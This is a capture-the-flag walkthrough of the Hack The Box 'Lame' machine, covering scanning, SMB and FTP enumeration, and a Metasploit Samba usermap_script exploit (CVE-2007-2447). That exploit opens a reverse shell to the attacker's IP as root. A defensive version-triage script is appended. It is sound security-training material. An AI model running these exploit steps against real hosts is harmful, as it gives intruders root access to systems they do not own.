HTB Walkthrough - Lame
Tony Harkness
- 4 minutes read - 668 words
Information Gathering
Scanned all TCP ports:
# save target IP as local variable
export ip='10.10.10.3'
# box name, used for the output filename (assumed to match the machine name)
export boxname='lame'
# initial scan (braces are needed, otherwise the shell expands $boxname_initial as one variable)
rustscan -a $ip -- -sVC -T4 -oN /tmp/${boxname}_initial.nmap
# scan results (had to rerun nmap with -Pn flag)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.150
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 2h30m21s, deviation: 3h32m10s, median: 19s
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2025-12-29T11:40:28-05:00
Enumeration
First, I added the hostnames to the /etc/hosts file:
echo '10.10.10.3 lame.hackthebox.gr lame.htb'|sudo tee -a /etc/hosts
Only the first hostname was present in the nmap scan, but I added the second because that's the standard naming for HTB machines.
Next, the nmap scan showed that anonymous FTP login was allowed, so I logged in to see whether anything could be retrieved:
╭─kali at kali in ~/htb/b2r/lame
╰─○ ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:kali): ftp
331 Please specify the password.
Password:
230 Login successful.
Unfortunately, nothing was available here. Next, I used smbclient to check for anonymously accessible SMB shares:
╭─kali at kali in ~/htb/b2r/lame
╰─○ smbclient -N -L //10.10.10.3
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP LAME
I attempted to download everything in the tmp share:
╭─kali at kali in ~/htb/b2r/lame
╰─○ smbclient //10.10.10.3/tmp -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> prompt OFF; recurse ON; mget *
╭─kali at kali in ~/htb/b2r/lame
╰─○ ls
.ICE-unix .X11-unix vmware-root .X0-lock vgauthsvclog.txt.0
The text file (vgauthsvclog.txt.0) reveals a clock skew but nothing useful.
Exploitation
At this point we're at a standstill, so the next step is to check exploit-db for exploits against the service versions identified so far:
╭─kali at kali in ~/htb/b2r/lame
╰─○ searchsploit vsftpd 2.3.4
Exploit Title <snip>
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
<snip>
---------------------------------------------------
╭─kali at kali in ~/htb/b2r/lame
╰─○ searchsploit samba 3.0.20
Exploit Title
<snip>
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
<snip>
First, I attempted the FTP backdoor; unfortunately, it failed:
msf exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
Now I'll attempt the SMB exploit:
msf exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 10.10.14.150:4444
[*] Command shell session 1 opened (10.10.14.150:4444 -> 10.10.10.3:58928) at 2025-12-29 12:15:41 -0500
id;whoami;pwd
uid=0(root) gid=0(root)
root
/
We can now grab both flags 😀
Steps 2 Pwn
- Scan + enumeration with rustscan
- Search exploits for service versions
- Attempt the Metasploit module for Samba 3.0.20 (CVE-2007-2447)
- Shell as root, grab flags
Improved skills
- When enumeration turns up nothing valuable, go back to what you already know. In this case that was the service versions; checking for known exploits against them shouldn't be overlooked.
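As an added example (not part of the original walkthrough), the version check above can be automated: this script parses the nmap -oN service table quoted earlier and flags the same legacy versions this post matched with searchsploit, plus the disabled SMB signing reported by the host script. The scan excerpt is constructed from the output on this page and the watchlist notes use only the exploit-db IDs and CVE cited here.

```python
import re

# Constructed excerpt of the nmap -oN output quoted in this walkthrough
# (the service table plus the smb-security-mode host-script line).
SCAN = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
|_  message_signing: disabled (dangerous, but default)
"""

# Watchlist of (service, version regex, note). The references are the
# searchsploit IDs and CVE cited in the walkthrough; the Samba range follows
# the "3.0.20 < 3.0.25rc3" title, so 3.0.20 through 3.0.24 match here.
WATCHLIST = [
    ("ftp", r"^vsftpd 2\.3\.4\b", "EDB-17491 backdoored build; replace vsftpd"),
    ("netbios-ssn", r"^Samba smbd 3\.0\.2[0-4]\b",
     "CVE-2007-2447 / EDB-16320 username map script; upgrade Samba"),
]

# One row of the nmap service table: PORT/PROTO STATE SERVICE VERSION
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_services(text):
    """Return one dict per 'PORT STATE SERVICE VERSION' row of nmap -oN output."""
    rows = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            port, proto, state, service, version = m.groups()
            rows.append({"port": int(port), "proto": proto, "state": state,
                         "service": service, "version": version.strip()})
    return rows

def triage(text):
    """Return sorted (port, note) findings; port 0 marks host-wide findings."""
    findings = []
    for row in parse_services(text):
        if row["state"] != "open":
            continue
        for service, pattern, note in WATCHLIST:
            if row["service"] == service and re.search(pattern, row["version"]):
                findings.append((row["port"], note))
    # Signing disabled is a host-wide SMB weakness, reported under port 0.
    if re.search(r"message_signing:\s*disabled", text):
        findings.append((0, "SMB signing disabled; set 'server signing = mandatory'"))
    return sorted(findings)
```

Running `triage(SCAN)` on the constructed excerpt yields findings for port 21, port 445 and the host-wide signing weakness; the OpenSSH and distccd rows are parsed but not on this watchlist.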
Used tools
- rustscan
- smbclient
- msfconsole
- searchsploit